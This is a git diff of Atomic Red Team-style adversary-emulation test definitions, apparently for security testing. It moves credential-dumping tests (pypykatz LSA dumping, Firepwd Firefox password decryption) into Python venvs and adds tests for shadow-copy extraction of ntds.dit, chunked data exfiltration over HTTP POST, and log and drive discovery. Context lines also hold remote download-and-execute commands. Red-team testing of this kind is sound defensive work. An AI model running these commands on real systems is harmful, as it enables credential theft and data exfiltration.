       auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-      description: 'Parses registry hives to obtain stored credentials
+      description: |
+        Parses registry hives to obtain stored credentials.
 
-        '
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
       supported_platforms:
       - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+      dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must have python 3 installed
 
           '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "Python 3 must be installed manually"
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
 
           '
-      - description: 'Computer must have pip installed
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "PIP must be installed manually"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
 
           '
-      - description: 'pypykatz must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"
 
           '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null
 
           '
       executor:
-        command: 'pypykatz live registry
-
-          '
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
         name: command_prompt
         elevation_required: true
     - name: esentutl.exe SAM copy
@@ -85363,14 +86091,16 @@ credential-access:
       auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
       description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
         Firefox) passwords.\nUpon successful execution, the decrypted credentials
-        will be output to a text file, as well as displayed on screen. \n"
+        will be output to a text file, as well as displayed on screen. \n\nWill create
+        a Python virtual environment within the External Payloads folder that can
+        be deleted manually post test execution.\n"
       supported_platforms:
       - windows
       input_arguments:
         Firepwd_Path:
           description: Filepath for Firepwd.py
           type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
         Out_Filepath:
           description: Filepath to output results to
           type: string
@@ -85383,17 +86113,12 @@ credential-access:
           description: Filepath to python
           type: string
           default: C:\Program Files\Python310\python.exe
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
       dependency_executor_name: powershell
       dependencies:
-      - description: 'Firepwd must exist at #{Firepwd_Path}
-
-          '
-        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
       - description: 'Firefox profile directory must be present
 
           '
@@ -85429,36 +86154,52 @@ credential-access:
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Pip must be installed.
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: 'Firepwd must exist at #{Firepwd_Path}
+
+          '
+        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
       - description: "Pycryptodome library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pycryptodome) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe
+          install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" |
+          out-null} else {write-host "Visual Studio Build Tools (C++ Support) must
+          be installed to continue gathering this prereq"}
+
+          '
       - description: "Pyasn1 library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pyasn1) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe
+          install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null}
+          else {write-host "Visual Studio Build Tools (C++ Support) must be installed
+          to continue gathering this prereq."}
+
+          '
       executor:
         name: powershell
         command: |
           $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-          cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+          cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
           cat #{Out_Filepath}
         cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
           \  \n"
@@ -86756,42 +87497,50 @@ credential-access:
         Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
 
         Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
       supported_platforms:
       - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+      dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must have python 3 installed
 
           '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
         get_prereq_command: |
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'pypykatz must be installed and part of PATH
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
 
           '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null
 
           '
       executor:
-        command: 'pypykatz live lsa
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
+        cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul
 
           '
         name: command_prompt
@@ -90793,6 +91542,24 @@ credential-access:
           mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         name: command_prompt
         elevation_required: true
+    - name: Create Volume Shadow Copy with diskshadow
+      auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+      description: |
+        This test is intended to be run on a domain controller
+        An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the script
+          type: Path
+          default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+      executor:
+        command: |
+          mkdir c:\exfil
+          diskshadow.exe /s #{filename}
+        name: command_prompt
+        elevation_required: true
   T1558.003:
     technique:
       modified: '2023-03-30T21:01:46.538Z'
@@ -94910,6 +95677,15 @@ discovery:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           printercheck -noninteractive -consoleoutput
         name: powershell
+    - name: Peripheral Device Discovery via fsutil
+      auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
+      description: Performs pheripheral device discovery utilizing fsutil to list
+        all drives.
+      supported_platforms:
+      - windows
+      executor:
+        command: fsutil fsinfo drives
+        name: command_prompt
   T1082:
     technique:
       modified: '2023-03-30T21:01:40.871Z'
@@ -97537,6 +98313,20 @@ discovery:
           Ignore"
         name: powershell
         elevation_required: true
+    - name: Enumerate Windows Security Log via WevtUtil
+      auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd
+      description: "WevtUtil is a command line tool that can be utilised by adversaries
+        to gather intelligence on a targeted Windows system's logging infrastructure.
+        \n\nBy executing this command, malicious actors can enumerate all available
+        event logs, including both default logs such as Application, Security, and
+        System\nas well as any custom logs created by administrators. \n\nThis information
+        provides valuable insight into the system's logging mechanisms, potentially
+        allowing attackers to identify gaps or weaknesses in the logging configuration"
+      supported_platforms:
+      - windows
+      executor:
+        command: wevtutil enum-logs
+        name: command_prompt
   T1087.004:
     technique:
       x_mitre_platforms:
@@ -99295,40 +100085,47 @@ discovery:
           description: hostname or ip address to connect to.
           type: string
           default: 192.168.1.1
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must have python 3 installed
 
           '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
 
           '
         get_prereq_command: |
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
           invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
           Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}
 
           '
-        prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit
+          1 }
 
           '
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'adidnsdump must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"
 
           '
-        prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      - description: 'adidnsdump must be installed
 
           '
-        get_prereq_command: 'pip3 install adidnsdump
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          adidnsdump 2>&1 | Out-Null
 
           '
       executor:
-        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+        command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass}
+          --print-zones #{host_name}
 
           '
         name: command_prompt
@@ -99769,7 +100566,8 @@ discovery:
       - description: 'Check if python exists on the machine
 
           '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
 
           '
         get_prereq_command: |
@@ -111983,6 +112781,38 @@ exfiltration:
 
           '
         name: sh
+    - name: Network-Based Data Transfer in Small Chunks
+      auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+      description: Simulate transferring data over a network in small chunks to evade
+        detection.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_file_path:
+          description: Path to the source file to transfer.
+          type: path
+          default: "[User specified]"
+        destination_url:
+          description: URL of the destination server.
+          type: url
+          default: http://example.com
+        chunk_size:
+          description: Size of each data chunk (in KB).
+          type: integer
+          default: 1024
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $file = [System.IO.File]::OpenRead(#{source_file_path})
+          $chunkSize = #{chunk_size} * 1KB
+          $buffer = New-Object Byte[] $chunkSize
+
+          while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+              $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+              Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+          }
+          $file.Close()
   T1537:
     technique:
       x_mitre_platforms:
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index 31a40608..e6cc1b78 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -2032,7 +2032,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -2107,6 +2107,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -10549,7 +10550,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -28995,6 +28996,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -30298,7 +30300,8 @@ execution:
           which_python=$(which python || which python3 || which python3.9 || which python2)
           $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
         name: sh
-        cleanup_command: "rm #{payload_file_name} \n"
+        cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
+          nul\n"
     - name: Execute Python via scripts
       auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
       description: Create Python file (.py) that downloads and executes shell script
@@ -31987,7 +31990,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -32062,6 +32065,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -35883,7 +35887,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -35935,6 +35939,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -41841,6 +41846,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -43803,7 +43809,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -43825,6 +43831,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index 7f7e6726..e2b4bc5b 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -1580,7 +1580,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1655,6 +1655,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -9414,7 +9415,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -26925,6 +26926,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -29166,7 +29168,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -29241,6 +29243,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -32832,7 +32835,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -32884,6 +32887,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -38525,6 +38529,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -40460,7 +40465,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -40482,6 +40487,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml
index 5b5c75a1..c3096247 100644
--- a/atomics/Indexes/office-365-index.yaml
+++ b/atomics/Indexes/office-365-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -24017,6 +24018,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26194,7 +26196,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26269,6 +26271,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29543,7 +29546,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29595,6 +29598,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -34853,6 +34857,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36463,7 +36468,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
